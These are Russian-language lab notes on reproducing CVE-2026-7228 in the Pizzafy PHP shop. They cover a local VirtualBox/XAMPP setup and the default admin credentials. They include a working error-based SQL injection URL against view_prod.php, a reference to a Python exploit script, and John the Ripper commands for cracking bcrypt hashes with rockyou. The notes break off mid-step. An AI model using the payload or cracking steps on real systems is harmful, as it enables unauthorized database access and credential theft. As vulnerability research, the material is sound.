
ресурсы для исследования cve-2026-7228
ресурсы для исследования cve-2026-7228
установка virtual-box: https://www.virtualbox.org/wiki/Downloads
https://www.microsoft.com/it-it/software-download/windows11
https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html
уязвимость cve: https://nvd.nist.gov/vuln/detail/CVE-2026-7228
github для эксплойтов и решений: https://github.com/fernando-mengali/vulndb-submissions.git
Извлечь проект pizzafy и переместить папку в htdocs apache в xampp
сайт pizzafy: http://localhost/pizzafy/Pizzafy/
вход администратора: http://localhost/pizzafy/Pizzafy/admin/login.php
Учётные данные → Username: [email protected] Password: admin123
Конкретно SQL Injection Error-Based с возвратом ошибки в XML
Первый с методом GET : http://localhost/Pizzafy/pizzafy/view_prod.php?id=
9%20AND%20extractvalue(rand(),%20concat(0x7e,version()))%20--

Язык программирования: ==python==
Используемая библиотека: request import request
Файл эксплойта: /script/test.py
Выполнение test.py
Вывод:

Установка john the ripper для расшифровки паролей из hash value.Для операционных систем, таких как Kali, инструмент уже установлен.
Сохранить пароль(и) в текстовый файл: hash.txt
Установка файла rockyou.txt: git clone https://gitlab.com/kalilinux/packages/wordlists.git
gunzip rockyou.txt.gz
Тип зашифрованного пароля: ==bcrypt==
Выполнение инструмента с файлом wordlist: john --wordlist=rockyou.txt --format=bcrypt hash.txt
Вывод:

Пароль: admin123
Открыть virtual-box и задать ip-адрес через only-host для виртуальной машины windows 11


Запустить машину Windows 11 и проверить, правильно ли задан ip-адрес
Ввести: ipconfig

Запустить Apache и MySQL

python3 exploit.py
Открыть pizzafy/Pizzafy, найти файл view_prod.php и найти следующую часть:


